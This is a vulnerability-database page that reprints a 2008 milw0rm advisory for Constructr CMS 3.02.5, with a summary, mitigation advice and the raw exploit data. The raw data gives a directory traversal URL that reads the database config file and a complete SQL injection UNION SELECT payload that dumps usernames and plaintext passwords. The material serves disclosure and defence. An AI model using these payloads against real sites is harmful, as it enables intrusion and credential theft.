Constructr CMS

vendor:

Constructr CMS

by:

milw0rm.com

7.5

CVSS

HIGH

Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc

CWE

Product Name: Constructr CMS

Affected Version From: 03.02.2005

Affected Version To: 03.02.2005

Patch Exists: YES

Related CWE: N/A

CPE: a:constructr-cms:constructr_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Constructr CMS versions <= 3.02.5 have a vulnerability that allows attackers to traverse directories, disclose source code, and create arbitrary files. This is possible due to the magic_quotes_gpc and register_globals settings being set to Off and On respectively. Additionally, attackers can gain access to the database information by accessing the config/config.inc.php file. Furthermore, attackers can gain access to user information by using a SQL injection attack on the show_page parameter. The user's password is stored in plaintext in the hash field.

Mitigation:

Ensure that magic_quotes_gpc and register_globals are set to On and Off respectively. Additionally, ensure that all user input is properly sanitized and validated.

Source

Exploit-DB raw data:

Constructr CMS
http://constructr-cms.org/

- <= 3.02.5 "Stable" -

magic_quotes_gpc = Off
register_globals = On

- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=

Db info:
../config/config.inc.php


- SQL -
http://site/constructr/?show_page=

User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...


- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-19]